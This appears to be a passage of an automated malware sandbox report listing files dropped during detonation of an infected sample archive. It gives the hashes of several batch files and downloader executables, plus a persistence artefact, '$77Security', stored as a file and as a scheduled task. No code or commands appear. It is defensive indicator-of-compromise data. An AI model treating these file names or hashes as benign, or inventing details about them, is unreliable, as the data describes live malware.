| SHA1 | d8c62d8d73aeee1cbc714245f7a9a39fcfb80760 |
| SHA256 | 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c |
| SHA512 | 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd |
memory/4000-3107-0x0000000000950000-0x0000000000C74000-memory.dmp
memory/5024-3109-0x0000000000D30000-0x00000000010EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Svd8I7YPSQ3K.bat
| MD5 | 18aa2326833887bde08793cd1c00c071 |
| SHA1 | cf0089606fd67b7d3d270c123447e1a3870e225a |
| SHA256 | e27970fa980a42b72e2bffd1bd3a354621766b441546c48c069355e428773328 |
| SHA512 | 11aab7100e8a52bb089c60870ef01fc5420b56b9508d181e321a8b30cafd384c2535c9a60caddfb606c71ea4babef365fa5e6f4e3c9f26715b66ba64158397bd |
memory/3156-3134-0x000000001AFE0000-0x000000001B034000-memory.dmp
memory/4136-3144-0x0000000000150000-0x0000000000474000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\yoc2BHO9dwWq.bat
| MD5 | c32d3316d6555e7ddd9b9bbe80e0839e |
| SHA1 | 6b9484ef3134e8254cf496ed3175be9f7d4759a1 |
| SHA256 | b601a625e37f526a5e4801a6dfd7f456728faf3e315528131b2ccffff64c69ef |
| SHA512 | 8715a47380da7da9df732fb07c6457823014bbe04e0505ea5a2a0e29103f560f02640c4a983b90916aa67a03c41ad1f8cec742a1f89894f2c8c326229996d015 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\12.exe
| MD5 | b38d20c6267b77ca35a55e11fb4124b7 |
| SHA1 | bf17ad961951698789fa867d2e07099df34cdc7d |
| SHA256 | 92281aaffbb198760aacd304df932fd58ba230d0927839d85db71dc7ae6f7d71 |
| SHA512 | 17fc8504582edc41db8b62ca1e5238427ddea19b24d2efceb7c765903b8395b3276e4f4dc9df55c60a77b47e0d09491e16dbda18e82a4d6bfa6ed7cad5b8947e |
memory/4356-3167-0x0000000001200000-0x0000000001524000-memory.dmp
memory/4296-3172-0x0000000000B60000-0x0000000000BB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nOayiyqfpA1O.bat
| MD5 | f312e94feff99e1bb1595a3a6f19e12e |
| SHA1 | 325aa04a84605a726046bbc4faefadc6edb6dadf |
| SHA256 | 1a113b0fc7b637d3f1a1c227846b24e15f3a50499e21ad57202aea6271bc6515 |
| SHA512 | f71918bb03f4c9ac3e0287a041e39cc9703f21d1eec131dc8f6941cbb40dbc8dbbf1d6354d949c33c4a23c0a083c56bba8e6031bf52ba8c92492280e23b49031 |
memory/3596-3201-0x0000000000940000-0x0000000000994000-memory.dmp
memory/3664-3215-0x0000000000400000-0x0000000000452000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\WEBDOWN.EXE
| MD5 | 826c8ba6abcb7927c0356ff4cda7c493 |
| SHA1 | 12b474213666f72e3cf21143a7b1e6cef47718e3 |
| SHA256 | f58d67cb6098c57fa59c2a8c654b72660498d01c40c1bdb2ea1edbd28bf6b162 |
| SHA512 | 67b4664272ef72f58dcc82b745896d2d39bfeeaaeaa3056c24b61bbc1fcf2d75d504416ce7041e5d1aeda25891291b417db15ff4a6d99a8d03e1b03f482386f2 |
memory/5044-3237-0x0000000000A60000-0x0000000000D84000-memory.dmp
memory/1616-3281-0x0000000000400000-0x000000000074E000-memory.dmp
memory/3648-3280-0x0000000004010000-0x000000000435E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jGJjylnQwEBZ.bat
| MD5 | 0ff41de1acb7d8eb8c34e262720a724d |
| SHA1 | d895c2b828372a3bb7605f1ba1f30f3a8b766a1e |
| SHA256 | 1191e23b26f9b72b695b2994ddef4fdc212a54d74588f197e180294d560d44b9 |
| SHA512 | 76eacedc9907e43ccbab158d0b9aa79ad4252e3ede25b44e711b7844ba4118d17d35f6809b376280f89afd3c27bcb9134f9d870b519cc2d3181960cdeb7487ec |
memory/4752-3304-0x0000000000AA0000-0x0000000000B42000-memory.dmp
memory/4448-3317-0x0000000000260000-0x00000000002E0000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\scancop.exe
| MD5 | 21d13f2f3c4db8f083b672d81831fa5e |
| SHA1 | b93f931a10a8a4b6f155b6b2ad9c5f9fbb3d71d0 |
| SHA256 | 17bb66d25ec39d1818cc01e067ea7139eef15dcb24bce24840666eede661a3c3 |
| SHA512 | 005658047ae5bd43d2c709c640ffd60b17a3e551657502804dbfd288193b340834e74b6a007731f401d4fc62b76cbafde40e5a30b08f9fb00f9506b6438c470d |
memory/4244-3326-0x0000000000260000-0x0000000000584000-memory.dmp
memory/4588-3341-0x0000000000270000-0x0000000000284000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
C:\Users\Admin\AppData\Local\Temp\PHItso8lBIkf.bat
| MD5 | 76ddc7423cb7a7eeb1d0d51e6c2689b2 |
| SHA1 | a1363da5974f2fc627aab204315facce9d6d8653 |
| SHA256 | ccdffae2813d4e89bae1351d058dd00428352c26ade044bcc658b060d3e6172f |
| SHA512 | 78284ab9dd634acc7ee4b32c81b60ffaebc76aa71c01a9037082ae63fded5997777f203e57a863b2180075091bdad48c790cbe726342d36f29018c3f0f0757bf |
memory/4828-3357-0x0000000019F90000-0x000000001A272000-memory.dmp
memory/4828-3358-0x0000000000D50000-0x0000000000D58000-memory.dmp
memory/4828-3359-0x00000000012C0000-0x00000000012CE000-memory.dmp
memory/4828-3360-0x0000000001620000-0x0000000001666000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\5hvzv2sl.exe
| MD5 | cc3381bd320d2a249405b46982abe611 |
| SHA1 | 32a5bc854726c829da2fbaed02ff8d41ea55e432 |
| SHA256 | 781e958b54a63ef673857bfe9c0a5992eb44b06f15d5499f8e35e44b1e1c868c |
| SHA512 | 73c95936748b9edf103c28d558d885bfee070efc18d318581fb1723769a15bb642976bdfb93b36a0b68d869538e0ee3c1936d613240bf29d3ff64dbb3d20e2e4 |
memory/4828-3364-0x0000000001680000-0x0000000001688000-memory.dmp
memory/4828-3363-0x0000000001670000-0x000000000167A000-memory.dmp
memory/4828-3387-0x000000001A560000-0x000000001A5AE000-memory.dmp
memory/4828-3388-0x000000001A5E0000-0x000000001A60A000-memory.dmp
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\mnftyjkrgjsae.exe
| MD5 | a06a7af02c4a932448ff3a172d620e13 |
| SHA1 | 82b29b616d9a717b4502d7a849f5c2e3029a2840 |
| SHA256 | 29d3678e7aa0187318bc83bf5e6d9ca06fc0d6a858ce006b05f7f97322051ee7 |
| SHA512 | 6a50a157289b821f5e134d4bff0307b0e11b3a981601363177b5c96d5bff5c0dc72e4f50b8327290a25d623994e5fe4a18f17ad334896c116590b4a412889e20 |
memory/2700-3518-0x0000000005230000-0x00000000052B1000-memory.dmp
memory/1616-3521-0x0000000000400000-0x000000000074E000-memory.dmp
memory/2916-3520-0x0000000000A30000-0x0000000000AB1000-memory.dmp
memory/3648-3519-0x0000000004010000-0x000000000435E000-memory.dmp
memory/2700-3517-0x0000000005230000-0x00000000052B1000-memory.dmp
memory/2916-3569-0x0000000000A30000-0x0000000000AB1000-memory.dmp
memory/2648-3570-0x00000000011A0000-0x00000000011B2000-memory.dmp
C:\Users\Admin\AppData\Roaming\$77Security.exe
| MD5 | 12c1eb283c7106b3f2c8b2ba93037a58 |
| SHA1 | 540fc3c3a0a2cf712e2957a96b8aff4c071b0e7e |
| SHA256 | 35eb77c5983a70f24ba87d96685d1e2911b523d5972dfcbccf3e549316ff16f1 |
| SHA512 | 72d25cb84ba32b3680edbbf9be92ab279cb7caef6e166917ec68a7eb7c8530b926565faab8a98b05125ad16359149a86dee19b083531a21ac3b41f0c77c5349d |
C:\Users\Admin\AppData\Local\Temp\vcA5Tv90K4FS.bat
| MD5 | 1d717b916db773d3fc15931589eab717 |
| SHA1 | 7ba5cf06190b92ad33f1b9aa66df63e8bd9a182a |
| SHA256 | 97ca69942a2fcf56244d9335d845d84000753e709e7deba8a24c2189c35537d9 |
| SHA512 | 953accd2b20b1fceb8fced25b1a3c33f0f39962e75e3e8fd949f430b0d0f9bd42d892e340e6064462adf70870cf25f3a45e243b8f15a085c70a82288c8f4d572 |
memory/2700-3709-0x0000000005230000-0x00000000052B1000-memory.dmp
memory/2700-3710-0x0000000005230000-0x00000000052B1000-memory.dmp
memory/4716-3712-0x0000000001230000-0x0000000001554000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6zrByAls3DvP.bat
| MD5 | ccf9b4ed2ba0982290f6d585951f7741 |
| SHA1 | 9477001d4c581a11490e73b85a361caf4b8185d7 |
| SHA256 | 81ff03362a4b58f12b144db6dfc8d6af001d2b78227bdca7a8553a980a869616 |
| SHA512 | 11e87fed9e43063995a18311e3b93a417b5d05dcbcf4d3911c1f5c5b9abe7ecdc5a8b993e22bdcb081c1694267cc1cd84c2b502feacce44a1b4cb6652c0daf86 |
C:\Windows\System32\Tasks\$77Security
| MD5 | 8657edb9b8a8b572396eb0c916ea71dd |
| SHA1 | c653dcf6a904ba7e1d3b4917b434715933f9002d |
| SHA256 | 9cf90203684414aef909c905214bfc9771ec0f6b4ac4377a1fb0cad401344e37 |
| SHA512 | 3aba070180dba2f3e42286854427d6267652d7d686f84c55577de251ee1234c0206d45a9d17d3d887af4c0196cd01f654d0e4267192e57bca4e355f4fc3d8c17 |
C:\Users\Admin\AppData\Local\Temp\sVmf8lqIKSUG.bat
| MD5 | fecafe311047f9d27a0055c29a7455ab |
| SHA1 | 20a309563a9b4b8cad6a4803cf777b4b0bc4e7ac |
| SHA256 | ee8093647c882ca36e9c982387975f24eb13bb463ec4f652465cb8fcb6ae8754 |
| SHA512 | 5bb78e640f1ffed102584334950947f5de97936b035ca1863f055fc48f9bbb403cf9df7f9fefa94089931f8904ea88505613721157367065da1ccba2879ccd6a |
C:\Users\Admin\AppData\Local\Temp\E1kCl8cXHof9.bat
| MD5 | 493b01b34db5f0a8202b0bfb446c24d1 |
| SHA1 | 96d06eb399af5ffc6c0b987be275b81ad757a6fd |
| SHA256 | 55213983fabe3cfe2bb490ac83903d12bab336a13b9f87ec4123845440b0d60b |
| SHA512 | 10bcdfa0843408a319ef737081fefbebf5b957cbad963c4503e9b3f51d12c67b70756e29d2d3f66cc41dcfd39ab24cb209c796add36557ba359999e7304b2186 |
C:\Users\Admin\AppData\Local\Temp\IQsQgJ63pmbf.bat
| MD5 | 86c42b34a6dbd073add0fd765496d554 |
| SHA1 | a6664aff9eec3d1977bce38ad08f6c72511d209f |
| SHA256 | de138186e67e25afe4e64fd0a39c9dbd2b2f9760de603438409aef5d9f80d3bb |
| SHA512 | 9188b0a9c9d0470a32952a264238cf536524a8133df814be05c4cbd08651d7ac4bc544675a4a3746247574d38dc9e771ab7e681190bf0d0d407515132d2fd939 |